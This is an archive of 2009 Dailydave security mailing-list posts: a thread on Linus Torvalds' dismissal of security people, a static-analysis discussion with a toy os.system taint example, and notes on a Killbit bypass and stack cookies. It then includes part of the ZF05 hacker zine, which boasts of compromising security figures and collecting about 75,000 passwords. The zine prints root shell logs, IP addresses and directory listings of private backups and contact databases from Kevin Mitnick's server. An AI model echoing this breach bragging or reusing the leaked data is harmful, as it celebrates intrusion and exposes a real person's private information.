> > Really. > > If you cannot understand this FUNDAMENTAL issue, I don't know what can > make you do so. I absolutely despise most security people, because they > are idiots who do not understand development. They are idiots who do not > understand basic facts. They are idiots, who think the world is some kind > of black-and-white place where you can sort bugs into 'security' and 'not > security'. > > So here's a few simple rules: > > - people who argue for full disclosure are wrong > > - people who argue for hiding things and vendor-sec are wrong > > - people who think that there are "bugs" and "security bugs" are > fundamentaly wrong, and misguided, and will always do the wrong thing. > > The fact is, bugs are bugs. We don't know which of them are security > issues. We all make mistakes, and we _fix_ the mistakes, and some of the > fixes turn out to have way more subtle interactions than people even > realized! > > So you can ask developers to "always think of all the possible issues", > and you will be left with developers who won't have time or motivation to > actually do any real work. And they'll _still_ miss some subtle issue, and > they'll _still_ write code that has bugs. > > So how about people face REALITY instead of talking about idiotic > platitudes like people should be "differentiating normal bug fixes to the > security ones"? And it _is_ a platitude: it's something that sounds > "obviously correct", but it's at the same time clearly ignoring the fact > that reality is complicated. > > So f*ck me, shut up about idiotic things like that already! > > This whole bug really is a _prime_ example of how the bugfix was not at > all clearly a security fix at all, even though it obviously was a big > deal. And a security person who cannot understand that is not a security > person at all - he's just a f*cking poser. > > This is why I detest security lists. Lots of posturing and platitudes. 
And > look at who actually did the real work: a regular developer, and a regular > maintainer, neither of whom were thinking in terms of security. > > Security people are leaches. The real heroes are the people who do > development. The last thing security people should do is to ask the people > who do the REAL WORK to do more. > > Linus > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090728/27f5bd8d/attachment.htm From apconole at yahoo.com Tue Jul 28 08:34:13 2009 From: apconole at yahoo.com (Aaron) Date: Tue, 28 Jul 2009 05:34:13 -0700 (PDT) Subject: [Dailydave] Security people are leaches. [sic] In-Reply-To: <4A6E33B4.30180.252B77B7@pageexec.freemail.hu> References: <4A6E33B4.30180.252B77B7@pageexec.freemail.hu> Message-ID: <392650.22524.qm@web65409.mail.ac4.yahoo.com> How can you ever know which bug is a security bug, and which isn't? More importantly, how many bugs do people talk about as theoretically exploitable for some information vs. the ones which are practically exploitable. There may be a better way of classification (for example, when something is an oops/segfault/null dereference and is fixed, then say that) but since linux is Free (as in beer) and Open the onus is on you, the user, to figure out which fixes are pertinent to what you're doing and which are ancillary. Lets say there's a new bug introduced in the kernel. One that presents with the symptom of disclosing a user's password when the kernel is given some invalid argument to printk while processing the shadow file. However, when processing the etc/hosts file, it just discloses the contents of that file. Is that a security bug? You could argue yes; you could argue no. 
At the end of the day, someone has to do the work to figure out that it either does or doesn't have security implications. Linus' point is: A non-security person fixed it, submitted it to a non-security maintainer, and they committed it. They viewed it as some improper code. To go ahead and research and delve to figure out every path that could ever get impacted and therefore determine that it has security implications goes way beyond the scope of the patch writer and maintainer's jobs. If a security person wants to figure out that something has a security impact, they should. But to put additional burden on a software developer to make your job easier is bull. ________________________________ From: "pageexec at freemail.hu" To: dailydave Sent: Monday, July 27, 2009 7:09:40 PM Subject: [Dailydave] Security people are leaches. [sic] really. or at least according to one Linus Torvalds, who also happens to be the primary reason for not one, but two! of this year's pwnie nominations for lamest vendor response and most epic FAIL. apparently the fundamental issue he cannot understand is that if they don't know what bugs are security issues, maybe they should find people who do. or maybe bother reading those static checker reports that point them out. just a thought. also one cannot help but smile at the irony of divineint (put in charge of security at RH, no less ;) asking for more proper disclosure. how times change ;). also i guess exploit writers would heartily disagree with the notion that there's no difference between bugs and security bugs :P. anyway, without further ado, here's the latest masterpiece: On Sun, 19 Jul 2009, Eugene Teo wrote: > > If the upstream development community can start doing their part by > differentiating normal bug fixes to the security ones, I think most of > us will benefit from it. Ok, so this is a perfect example of the kind of IDIOTIC blathering that I hate to hear from security people. 
Quite frankly, people who state things like that ARE FUCKING MORONS. I'm sorry, but it's true. Learn it. Think about it. Deeply, and long. This who security exploit is a prime example of exactly why anybody who says something stupid like that is so stupid and so WRONG. Look at the bug that caused it. Look at the fix. Think about it. When the fix was committed, nobody thought it was a security bugfix. Really. If you cannot understand this FUNDAMENTAL issue, I don't know what can make you do so. I absolutely despise most security people, because they are idiots who do not understand development. They are idiots who do not understand basic facts. They are idiots, who think the world is some kind of black-and-white place where you can sort bugs into 'security' and 'not security'. So here's a few simple rules: - people who argue for full disclosure are wrong - people who argue for hiding things and vendor-sec are wrong - people who think that there are "bugs" and "security bugs" are fundamentaly wrong, and misguided, and will always do the wrong thing. The fact is, bugs are bugs. We don't know which of them are security issues. We all make mistakes, and we _fix_ the mistakes, and some of the fixes turn out to have way more subtle interactions than people even realized! So you can ask developers to "always think of all the possible issues", and you will be left with developers who won't have time or motivation to actually do any real work. And they'll _still_ miss some subtle issue, and they'll _still_ write code that has bugs. So how about people face REALITY instead of talking about idiotic platitudes like people should be "differentiating normal bug fixes to the security ones"? And it _is_ a platitude: it's something that sounds "obviously correct", but it's at the same time clearly ignoring the fact that reality is complicated. So f*ck me, shut up about idiotic things like that already! 
This whole bug really is a _prime_ example of how the bugfix was not at all clearly a security fix at all, even though it obviously was a big deal. And a security person who cannot understand that is not a security person at all - he's just a f*cking poser. This is why I detest security lists. Lots of posturing and platitudes. And look at who actually did the real work: a regular developer, and a regular maintainer, neither of whom were thinking in terms of security. Security people are leaches. The real heroes are the people who do development. The last thing security people should do is to ask the people who do the REAL WORK to do more. Linus _______________________________________________ Dailydave mailing list Dailydave at lists.immunitysec.com http://lists.immunitysec.com/mailman/listinfo/dailydave -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090728/1934f7cc/attachment-0001.htm From rafal at ishackingyou.com Tue Jul 28 10:07:08 2009 From: rafal at ishackingyou.com (Rafal M. Los) Date: Tue, 28 Jul 2009 09:07:08 -0500 Subject: [Dailydave] Static Analysis part 5 In-Reply-To: <4A6E7327.1030805@gmx.de> References: <4A6E0895.7020600@immunityinc.com> <4A6E7327.1030805@gmx.de> Message-ID: Halvar, all... I think it's even more complex than that. The whole problem with static analysis is the impact of the false-positive. We take for granted that Static Analysis generally makes piles of false-positives through analysis (either you're too strict, or too loose... either way is bad) and what that does goes deeper than just make that particular set of results questionable. Infosec generally has a hard enough time convincing developers (this is from experience, not anything else) that they have issues... 
but then dropping a 300-page report wherein you have thousands of "possible" issues (whether you use a probability scale or not) means that it's going to degrade further the *reputation* that the InfoSec folks have with the rest of the development organization. Vetting false-positives often requires a developer (or at least a compiled app to test with) meaning that there is a much deeper involvement to "get at the truth".

Then there's the issue of customer-supplied sanitization and validation routines. Tainted data is one thing but how does a static analysis engine determine that data that passes through Method_X(), for example, doesn't have the right level of sanitization or validation? You simply can't account for all the creative ways that developers can come up with to scrub vars, and it gets worse...

Don't get me wrong, I think there is a place for static analysis - but the truth is that there are limited use-cases for the technology. Halvar's examples illustrate a giant gaping hole in static analysis, being able to "be certain" is another huge problem... what you end up with is a report that requires a lot of further analysis, extensive vetting and a (potential) reputational hit to the InfoSec folks... that's a cost/benefit analysis that tips heavily towards the cost.

__
Rafal M. Los
Security & IT Risk Strategist
- Blog: http://preachsecurity.blogspot.com
- LinkedIn: http://www.linkedin.com/in/rmlos
- Twitter: http://twitter.com/RafalLos

--------------------------------------------------
From: "Halvar Flake"
Sent: Monday, July 27, 2009 10:40 PM
To: "dave"
Cc:
Subject: Re: [Dailydave] Static Analysis part 5

Tainting / untainting is generally a difficult topic.

- If I calculate the length of a tainted string, is the result tainted ?
- If I check some boundaries on this string, is the result untainted ?
- What if the boundaries I checked for are wrong ?

Can of worms, difficult to solve.
Cheers,
Halvar

dave wrote:
> If you haven't read it yet (and you like to read things), this is worth
> reading:
>
> http://samate.nist.gov/docs/NIST_Special_Publication_500-279.pdf
>
> There's a lot of meta-questions here, like "What sorts of
> vulnerabilities can automated techniques really find?" Scalability is
> hard too. "Can we look at 4500 buffer overflow bugs to triage them?" the
> paper asks.
>
> Many people don't see why it's hard to do static analysis automatically,
> which I think is always worth thinking about.
>
> For example, recently I was at a conference looking at a vendor's
> implementation of the traditional "data-flow-then-alert-on-tainted-data"
> algorithm. (As opposed to the
> "solve-massive-equation-to-understand-data-constraints" style).[1]
>
> We were looking at PHP, and I couldn't for the life of me figure out why
> the system was alerting on a particular code path. I will reproduce it
> here in python, since my PHP is weak.
>
> import os
>
> d = {}  # DEFINE dictionary
> # insert some tainted data to it, whole dictionary is tainted now.
> d["HI"] = TAINTED_USER_DATA
> # stuff goes here that is not relevant (we think)
> os.system(d["BYE"])  # ALERT!
>
> It turns out the analysis tool tainted the whole dictionary if any
> tainted data was inserted into it, because all the other solutions for
> that are...insanely complex. Maybe one of the static analysis gurus on
> the list knows of the best way to solve that particular problem and
> wants to share. (Or maybe there isn't a solution for that problem, and
> no one wants to point that out either? :>)
>
> -dave
> [1] Scanner Pong's rules are as follows. You must use the test programs
> the vendor brings with them to demonstrate their static analysis tool.
> For each vulnerability you look at you lose 1 point. For each
> vulnerability you look at that you show to be a false positive, you get
> 2 points.
> For each vulnerability you look at where the tool has missed
> an interesting vulnerability within 30 lines of code you get 5 points.

From dave at immunityinc.com Tue Jul 28 14:21:01 2009
From: dave at immunityinc.com (dave)
Date: Tue, 28 Jul 2009 14:21:01 -0400
Subject: [Dailydave] Killbits (I'm not dead yet!)
Message-ID: <4A6F418D.9000502@immunityinc.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Michael Howard has some of the gritty details of the Killbit bypass here (see Bug #2):
http://blogs.msdn.com/sdl/archive/2009/07/28/atl-ms09-035-and-the-sdl.aspx

I still don't really understand the vulnerability (do you have to get one ActiveX control instantiated in order to send it the marshalled property map that instantiates the vulnerable object?). But the patches are out, so the information is as free as it wanted to be.

- -dave
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org

iEYEARECAAYFAkpvQY0ACgkQtehAhL0ghep0KgCZAYW54dUIZf38qGsrjbeTI6A2
YD0AnjfE+jAcHiLQGDqK+wDS+uWlwP43
=e8Fa
-----END PGP SIGNATURE-----

From dave at immunityinc.com Tue Jul 28 16:58:24 2009
From: dave at immunityinc.com (dave)
Date: Tue, 28 Jul 2009 16:58:24 -0400
Subject: [Dailydave] Also don't read this post!
Message-ID: <4A6F6670.4030806@immunityinc.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

We had someone come in and interview today, and coincidentally I read this weblog post this morning:
http://vrt-sourcefire.blogspot.com/2009/07/dont-read-this-post.html

So of course, as the "interview", he got to sit down with Bas and write it up.
Our conclusion was that after 8.04, Ubuntu fixed their stack cookie and made it random (or at some point during 8.10?). The Ubuntu security team is on this list, so they can pipe in with when exactly[1], but I guess the point is this:

Assuming you're not using a Gentoo which optimizes out the default GCC protections or say, Ubuntu 8.04 (?), which does not implement proper stack cookies last time we checked, is there any real risk from this "awesome" vulnerability?

I haven't personally tested CentOS or Fedora or FreeBSD, but I have to assume they have their stack cookie done right.

- -dave

[1] Also please to be fixing Java Deserialize Bug!
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org

iEYEARECAAYFAkpvZnAACgkQtehAhL0gherYJwCfai6VhzV4QljK9Lc9DuuMNOJr
NusAn3KwG4tTmQO5HbmL6Vs4N8r5LSYl
=g7zp
-----END PGP SIGNATURE-----

From whitehell at rbcmail.ru Tue Jul 28 22:39:03 2009
From: whitehell at rbcmail.ru (Headenson John)
Date: Wed, 29 Jul 2009 06:39:03 +0400
Subject: [Dailydave] ZF05 Released
In-Reply-To:
References:
Message-ID:

That's ZF0 with a zero.
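The whole-dictionary tainting described in the "Static Analysis part 5" thread above, set beside a per-key alternative, as an added example (not code from the thread or from any vendor's tool). The tuple instruction format, `analyze`, and the sample programs are constructed for illustration and assume straight-line code with no aliasing and no branches.

```python
"""Toy taint tracker: whole-container vs per-key dictionary tainting.

Constructed example; assumes straight-line code, no aliasing, no branches.
"""

SOURCE = ("source",)   # stands in for TAINTED_USER_DATA
UNKNOWN = object()     # a key the analysis cannot resolve to a constant


def const(value):
    return ("const", value)


def var(name):
    return ("var", name)


class AbstractDict:
    def __init__(self):
        self.keys = {}        # constant key -> is the stored value tainted?
        self.smeared = False  # True once the whole container counts as tainted


def analyze(program, policy):
    """Return [(line, sink)] alerts; policy is 'container' or 'per_key'."""
    taint, consts, dicts, alerts = {}, {}, {}, []

    def tainted(expr):
        if expr[0] == "source":
            return True
        return expr[0] == "var" and taint.get(expr[1], False)

    def key_of(expr):
        if expr[0] == "const":
            return expr[1]
        if expr[0] == "var":
            return consts.get(expr[1], UNKNOWN)  # simple constant propagation
        return UNKNOWN                           # key taken straight from a source

    for line, ins in enumerate(program, 1):
        op = ins[0]
        if op == "newdict":
            dicts[ins[1]] = AbstractDict()
        elif op == "assign":
            _, dst, expr = ins
            taint[dst] = tainted(expr)
            consts[dst] = key_of(expr)
        elif op == "store":
            _, name, key_expr, val_expr = ins
            d, key, t = dicts[name], key_of(key_expr), tainted(val_expr)
            if policy == "container" or key is UNKNOWN:
                # Weak update: the written slot is not tracked (or not known),
                # so tainted data can only ever be added, never cleared.
                d.smeared = d.smeared or t
            else:
                d.keys[key] = t  # strong update of one known slot
        elif op == "load":
            _, dst, name, key_expr = ins
            d, key = dicts[name], key_of(key_expr)
            if d.smeared:
                taint[dst] = True
            elif key is UNKNOWN:
                taint[dst] = any(d.keys.values())
            else:
                taint[dst] = d.keys.get(key, False)
            consts[dst] = UNKNOWN
        elif op == "sink":
            _, sink, arg = ins
            if taint.get(arg, False):
                alerts.append((line, sink))
    return alerts


# d = {}; d["HI"] = TAINTED_USER_DATA; os.system(d["BYE"])   (the thread's case)
FROM_THREAD = [("newdict", "d"), ("store", "d", const("HI"), SOURCE),
               ("load", "cmd", "d", const("BYE")), ("sink", "os.system", "cmd")]

# Same program, but the sink really reads the tainted slot.
REAL_FLOW = [("newdict", "d"), ("store", "d", const("HI"), SOURCE),
             ("load", "cmd", "d", const("HI")), ("sink", "os.system", "cmd")]

# k = TAINTED; d[k] = TAINTED: the user picks the slot, so every slot is suspect.
USER_KEY = [("newdict", "d"), ("assign", "k", SOURCE),
            ("store", "d", var("k"), SOURCE),
            ("load", "cmd", "d", const("BYE")), ("sink", "os.system", "cmd")]


def compare(program):
    """Alerts under both policies, keyed by policy name."""
    return {p: analyze(program, p) for p in ("container", "per_key")}


if __name__ == "__main__":
    for label, prog in (("from thread", FROM_THREAD), ("real flow", REAL_FLOW),
                        ("user-chosen key", USER_KEY)):
        print(label, compare(prog))
```

Per-key tracking drops the false positive only while keys resolve to constants; one store through an unresolved key puts it back at whole-container precision, which is the cost the thread alludes to.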
-------------- next part --------------

0. Intro
1. Kevin Mitnick
2. 0x000000
3. Industry check
4. Dan Kaminsky
5. Hacking in gitmo
6. darkmindz
7. Robert Lemos II
8. Interlude
9. PerlMonks
10. elitehackers.info
11. Binary Revolution
12. Pwnie Awards
13. hak5
14. CF0
15. cr0.org
16. Scene check
17. blackhat-forums
18. Last Words

S y m a n t e c - T h r e a t C o n
Level 31337: Segmentation fault
Manipulate threat level to read back the stack and abuse info disclosure

Intro

It's July 28th, 2009! Welcome one and all to the real Black Hat Briefings.
Live from the underground, coming right at you free of charge. You don't have to pay to come, and you don't get paid to be featured. Presented by real blackhats, this is a must-see event! This is a big one. We hacked notable whitehats Kevin Mitnick, Dan Kaminsky, and Julien Tinnes, among others. We continued the skiddie holocaust with darkmindz, elitehackers, hak5, binrev, and blackhat-forums. Along the way we created mass mayhem. There are more rm's in this zine than you can count on a hand. Just from targets shown here we collected about 75,000 passwords. Passes, not hashes. If you are reading this, then your browser probably did not crash, so you know we couldn't include all of our passwords, let alone hashes. The first version of this was ten times the size of ZF04. > lol yeah I'm gonna have to trim > and by "trim" I mean "remove everything" Let's get warmed up with the first song from the zf05 mix tape, Search & Destroy by classic Iggy Pop. Look for the rest of the songs in the article headers. ~ I'm a street walking cheetah with a hide full of napalm I'm a runaway son of the nuclear A-bomb I am a world's forgotten boy The one who searches and destroys Honey gotta help me please Somebody gotta save my soul Baby detonate for me Look out honey, 'cause I'm using technology Ain't got time to make no apology Soul radiation in the dead of night Love in the middle of a fire fight Honey gotta strike me blind Somebody gotta save my soul Baby penetrate my mind And I'm the world's forgotten boy The one who's searchin', searchin' to destroy And honey I'm the world's forgotten boy The one who's searchin', searchin' to destroy ~ Are you ready? | \ / _\/_ Kevin Mitnick - Freedom Owntime .-'-. //o\ _\/_ -- / \ -- | /o\\ ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~` I got a list of demands | written on the palm of my hands Kevin Mitnick, hero to many, wet dream to Emmanuel Goldstein. Consider this a follow up to the cDc article. 
Kevin has become the media rep for the hacker community, something which he has grown further and further apart from ever since his release. Without John Markoff's sensationalist reporting Kevin Mitnick would not have the notoriety that allows him to earn his money providing keynotes at conferences all over the world. Kevin is polluting the media with bullshit.

Whilst we understand that owning him is something which has been done many, many times, we felt that not presenting his insecurity publicly would be wrong. Since 2003 this has been done three times of note and Kevin has used his enormously powerful SOCIAL ENGINEERING techniques to escape with an unharmed reputation each time. The fact is that he cannot secure his systems because he does not know how.

Oh before I forget, we were behind the Mitnick mantraining. It was a beautifully executed social engineering experiment that worked flawlessly and also provided us with superb quotes. What can I say, The Art of Deception was some of the most enthralling 352 pages I have ever read.

I now present you some of his excellent excuses:

"The Web hosting provider that hosts my sites was hacked," Mitnick told CNET News.com in an interview Monday. "Fortunately, I don't keep any confidential data on my Web site, so it wasn't that serious. Of course, it is embarrassing to be defaced--nobody likes it."

Defacing Web sites is akin to graffiti in the brick-and-mortar world. "It is kind of stupid; they do it for the attention," Mitnick said. "When I was a hacker, I never stooped to defacing sites because that was more like vandalism; that wasn't any fun. It is more about getting in and being stealth and looking around and exploring."

Let me set something straight Kevin, www.kevinmitnick.com is your responsibility to secure. You run a security auditing company - what went wrong?
One thing I notice about the above, Kevin referring to himself as a hacker in past tense - heh, at least he doesn't fall for the common fallacy that 'hackers' are not anything other than people who break into systems. "They keep getting compromised," he said. "Maybe I'll move it over to Amazon or something and let them attack Amazon." That'd be great Kev, hopefully you'll shift our doors straight over there. root at www.kevinmitnick.com's password: Last login: Mon Jul 13 17:08:58 2009 from 58.jerveyave.com --------------------------------------------------------------------------- This computer system is for authorized users only. All activity is logged and regularly checked by systems personnel. Individuals using this system without authority or in excess of their authority are subject to having all their services revoked. Any illegal services run by user or attempts to take down this server or it's services will be reported to local law enforcement, and said user will be punished to the full extent of the law. Anyone using this system consents to these terms. 
124.125.89.117:55416 ESTABLISHED tcp 0 0 69.65.59.78:58434 65.254.36.154:21 ESTABLISHED tcp 0 51840 69.65.59.78:38345 65.254.36.154:49565 ESTABLISHED tcp 0 52 ::ffff:69.65.59.78:3442 ::ffff:67.169.204.62:33145 ESTABLISHED Active UNIX domain sockets (servers and established) mitsec at mitnicksecurity.com [/]# netstat -an | grep 67.169.204.62 netstat -an 98.99.158.166tcp 0 0 ::ffff:69.65.59.78:3442 ::ffff:98.99.158.166:64118 ESTABLISHED netstat -an users who netstat -an netstat -an | grep .248 netstat -an netstat -an | gep 67.214.58.248 netstat -an | grep 67.214.58.248 netstat netstat | grep 67.214.58.248 netstat -an last last -a netstat | grep 216.245.214.108 last exit cd public_html/ ls -tal | more exit ls cd mail ls -lta ls new cd new cat * cd .. ls ls -lta ls -l cur ls -l mitnicksecurity.com/ ls -latR | more ls cd mitnicksecurity.com/ cd kmitnick/ ls ls cur cd new ls more * cd .. cd .. cd .. ls w last mitsec exit ls cd www/ ls ls c* cd ls cd public_ cd public_html/ ls vi contact_form.php exitroot at dc21 [~]# ls -al total 10085472 drwxr-xr-x 22 mitsec mitsec 4096 Jul 16 10:36 . drwxr-xr-x 12 root root 4096 Jul 16 10:36 .. 
-rwxr-xr-x 1 mitsec mitsec 64 Mar 20 2007 .Xauthority
-rwxr-xr-x 1 mitsec mitsec 2399 Jul 9 10:01 .bash_history
-rwxr-xr-x 1 mitsec mitsec 24 Feb 25 2006 .bash_logout
-rwxr-xr-x 1 mitsec mitsec 191 Feb 25 2006 .bash_profile
-rwxr-xr-x 1 mitsec mitsec 124 Feb 25 2006 .bashrc
-rwxr-xr-x 1 mitsec mitsec 5619 Aug 21 2006 .canna
-rwxr-xr-x 1 mitsec mitsec 17 Jan 30 2006 .contactemail
-rwxr-xr-x 1 mitsec mitsec 10 Jan 30 2006 .contactsavetime
drwxr-xr-x 5 mitsec mitsec 4096 Mar 21 12:58 .cpanel
-rwxr-xr-x 1 mitsec mitsec 1682 Jan 23 2005 .cpanel-ducache
-rwxr-xr-x 1 mitsec mitsec 19 Jul 17 10:46 .dns
-rwxr-xr-x 1 mitsec mitsec 383 Aug 21 2006 .emacs
drwxr-xr-x 5 mitsec mitsec 4096 Sep 1 2008 .fantasticodata
-rwxr-xr-x 1 mitsec mitsec 16 Jul 2 23:11 .ftpquota
drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 .gnupg
drwxr-xr-x 52 mitsec nobody 4096 Sep 1 2008 .htpasswds
-rwxr-xr-x 1 mitsec mitsec 7 Sep 2 2008 .lang
-rw------- 1 mitsec mitsec 14 Jul 16 10:22 .lastlogin
-rwxr-xr-x 1 mitsec mitsec 35 Jan 13 2009 .lesshst
-rwxr-xr-x 1 mitsec mitsec 6441532 May 6 2006 .pureftpd-upload.445d6ea6.15.1358.7997c79e
drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 .sqmaildata
drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 .ssh
drwxr-xr-x 2 mitsec mitsec 4096 Mar 28 2007 .trash
-rwxr-xr-x 1 mitsec mitsec 705 Feb 28 2008 .viminfo
-rwxr-xr-x 1 mitsec mitsec 5 Mar 5 2006 .whmtheme
-rwxr-xr-x 1 mitsec mitsec 658 Aug 21 2006 .zshrc
-rwxr-xr-x 1 mitsec mitsec 1361309 Mar 7 2008 CDMA WORKSHOP.rar
-rwxr-xr-x 1 mitsec mitsec 73025457 Mar 20 2007 MitnickDemo.wmv
-rwxr-xr-x 1 mitsec mitsec 20152320 Mar 7 2008 SOFTWARE PACK.rar
-rwxr-xr-x 1 mitsec mitsec 49569 Mar 7 2008 UNIBOX.rar
lrwxrwxrwx 1 mitsec mitsec 32 Jul 7 19:34 access-logs -> /usr/local/apache/domlogs/mitsec
-rwxr-xr-x 1 mitsec mitsec 582461440 Aug 7 2007 archive.tar
-rwxr-xr-x 1 mitsec mitsec 607360 Sep 4 2007 arcot.ppt
-rwxr-xr-x 1 mitsec mitsec 30242339 Jul 25 2007 asterisk-1.0.8-backup-2007-07-25.tar.gz
-rwxr-xr-x 1 mitsec mitsec 2189910925 Oct 25 2007 backup-10.25.2007_23-54-41_mitsec.tar.gz
-rw------- 1 mitsec mitsec 3264566004 Jul 16 10:35 backup-7.16.2009_10-22-58_mitsec.tar.gz
-rw------- 1 mitsec mitsec 3264029970 Jul 8 16:51 backup-7.8.2009_16-39-47_mitsec.tar.gz
-rwxr-xr-x 1 mitsec mitsec 617186883 Aug 19 2007 backup-8.19.2007.tar.gz
-rwxr-xr-x 1 mitsec mitsec 90279 Nov 6 2006 badboys.mp3
-rwxr-xr-x 1 mitsec mitsec 211 May 5 2007 boot.ini
-rwxr-xr-x 1 mitsec mitsec 5305344 Feb 7 2007 circosec-FINAL.ppt
-rwxr-xr-x 1 mitsec mitsec 5299200 Jan 8 2007 circosec.ppt
-rwxr-xr-x 1 mitsec mitsec 99001 Nov 21 2007 clid.tar.gz
-rwxr-xr-x 1 mitsec mitsec 50838 Jun 20 03:10 contact_form.php
drwxr-xr-x 4 mitsec mitsec 4096 Sep 1 2008 cpanel3-skel
-rwxr-xr-x 1 mitsec mitsec 1 Jan 20 22:01 cpbackup-exclude.conf
drwxr-xr-x 2 mitsec mitsec 4096 Mar 18 00:19 cpmove.psql
drwxr-xr-x 3 mitsec mitsec 4096 Sep 1 2008 cpmove.psql.1220367507
drwxr-xr-x 3 mitsec mitsec 4096 Sep 2 2008 cpmove.psql.1237665475
-rwxr-xr-x 1 mitsec mitsec 238515 Aug 19 2007 error_log
-rwxr-xr-x 1 mitsec mitsec 72854668 Aug 3 2008 error_log.txt
drwxr-x--- 14 mitsec mail 4096 Oct 23 2008 etc
-rwxr-xr-x 1 mitsec mitsec 33449 Nov 24 2007 etcasterisk.tar.gz
-rwxr-xr-x 1 mitsec mitsec 74625550 Oct 20 2007 files.zip
-rwxr-xr-x 1 mitsec mitsec 17912486 Apr 18 2007 for-faa.zip
-rwxr-xr-x 1 mitsec mitsec 35938 Apr 6 2007 httpd.conf
-rwxr-xr-x 1 mitsec mitsec 35186 Apr 6 2007 httpd.conf.rpmnew
-rwxr-xr-x 1 mitsec mitsec 1515582 Nov 12 2006 issa.jpg
-rwxr-xr-x 1 mitsec mitsec 0 Aug 29 2006 landesk.ppt
-rwxr-xr-x 1 mitsec mitsec 0 Aug 29 2006 landesk1.ppt
-rwxr-xr-x 1 mitsec mitsec 0 Aug 29 2006 landesk2.ppt
drwxr-xr-x 2 mitsec mitsec 4096 Aug 13 2007 logs
drwxrwx--- 10 mitsec mitsec 4096 Mar 21 14:35 mail
-rwxr-xr-x 1 mitsec mitsec 38559604 Apr 25 2005 mitnickpromo2.mov
-rwxr-xr-x 1 mitsec mitsec 18084536 Apr 18 2007 mitnickpromo2.wmv
-rwxr-xr-x 1 mitsec mitsec 600292 Aug 7 2007 mitsec_mitsecmscontact.csv.zip
-rwxr-xr-x 1 mitsec mitsec 616494 Aug 7 2007 mitsec_mitsecmscontact.sql.zip
-rwxr-xr-x 1 mitsec mitsec 693914 Aug 7 2007 mitsec_mitsecmscontact.xls.zip
-rwxr-xr-x 1 mitsec mitsec 1506 Apr 4 2007 mod_security.conf
drwxr-xr-x 5 mitsec mitsec 4096 Sep 1 2008 moved
-rwxr-xr-x 1 mitsec mitsec 9457 Nov 18 2006 presentations.php
drwxr-xr-x 3 mitsec mitsec 4096 Mar 21 14:34 public_ftp
drwxr-xr-x 24 mitsec nobody 4096 Jul 9 10:01 public_html
-rwxr-xr-x 1 mitsec mitsec 11274 Apr 4 2007 ssl.conf
drwxr-xr-x 2 mitsec mitsec 4096 Jan 30 2008 stuff
drwxr-xr-x 7 mitsec mitsec 4096 Oct 10 2008 tmp
-rwxr-xr-x 1 mitsec mitsec 30189757 Nov 24 2007 varlib.tar.gz
-rwxr-xr-x 1 mitsec mitsec 66023 Jun 19 21:23 websitephp.tar.gz
lrwxrwxrwx 1 mitsec mitsec 11 Jul 7 19:18 www -> public_html
drwxr-xr-x 2 mitsec mitsec 4096 Nov 12 2006 zzhp
-rwxr-xr-x 1 mitsec mitsec 61314 Jun 19 22:03 zzhp.tar.gz
root at dc21 [~]# cd www/; ls -la
total 82928
drwxr-xr-x 24 mitsec nobody 4096 Jul 9 10:01 .
drwxr-xr-x 22 mitsec mitsec 4096 Jul 16 10:36 ..
-rwxr-xr-x 1 mitsec mitsec 629 Feb 26 14:36 .htaccess
-rwxr-xr-x 1 mitsec mitsec 729350 Aug 7 2007 CSC-Testimonial.pdf
-rwxr-xr-x 1 mitsec mitsec 1194067 May 12 2008 FBI_Pretexts_and_Cover_Techniques_May-1956.pdf
-rwxr-xr-x 1 mitsec mitsec 2547699 Aug 7 2007 Mitnick_Playboy_feature.pdf
-rwxr-xr-x 1 mitsec mitsec 687114 Nov 15 2008 PsychologyToday1208.pdf
-rwxr-xr-x 1 mitsec mitsec 117138 Mar 1 2008 US-pretrial.pdf
-rwxr-xr-x 1 mitsec mitsec 1038 Oct 20 2007 _contact_settings.php
-rwxr-xr-x 1 mitsec mitsec 528 Jan 18 16:26 _footer.php
-rwxr-xr-x 1 mitsec mitsec 3133 Aug 7 2007 _header.php
-rwxr-xr-x 1 mitsec mitsec 1380 Mar 28 2005 _news_frontpage.php
-rwxr-xr-x 1 mitsec mitsec 18277 Jun 28 15:20 _sidebar.php
drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 alexkasper
drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 amc
-rwxr-xr-x 1 mitsec mitsec 37314215 Oct 20 2007 amc.zip
-rwxr-xr-x 1 mitsec mitsec 2798 Aug 7 2007 aoi_reviews.php
drwxr-xr-x 2 mitsec mitsec 4096 Oct 24 2008 blittle
drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 cgi-bin
drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 cialdini
drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 circosec
drwxr-xr-x 2 mitsec mitsec 4096 May 15 01:46 clid
-rwxr-xr-x 1 mitsec mitsec 2870 Aug 7 2007 company.php
-rwxr-xr-x 1 mitsec mitsec 2462 Jan 13 2006 config.php
drwxr-xr-x 4 mitsec mitsec 4096 Sep 1 2008 contact-admin
-rwxr-xr-x 1 mitsec mitsec 2216 Aug 7 2007 contact-old.php
-rwxr-xr-x 1 mitsec mitsec 2174 Mar 19 2007 contact-saved.php
-rwxr-xr-x 1 mitsec mitsec 1662 Aug 26 2007 contact.php
-rwxr-xr-x 1 mitsec mitsec 22744 Nov 16 2006 contact.php.bk
-rwxr-xr-x 1 mitsec mitsec 22519 Nov 13 2006 contact.php.save
-rwxr-xr-x 1 mitsec mitsec 1054 Aug 7 2007 contact_confirmation.php
-rwxr-xr-x 1 mitsec mitsec 50576 Jun 20 03:17 contact_form.matt
-rwxr-xr-x 1 mitsec mitsec 50245 Jun 9 15:45 contact_form.oldform
